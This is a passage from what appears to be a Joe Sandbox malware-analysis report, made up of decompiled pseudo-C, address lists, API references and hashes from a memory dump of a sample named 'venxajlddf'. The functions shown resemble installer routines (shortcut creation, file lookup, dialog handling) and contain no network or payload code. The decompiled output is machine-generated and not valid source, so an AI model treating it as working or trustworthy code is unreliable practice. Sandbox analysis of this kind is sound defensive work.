								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Albus\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-2935972921
Opcode ID: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(7556D4C4,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
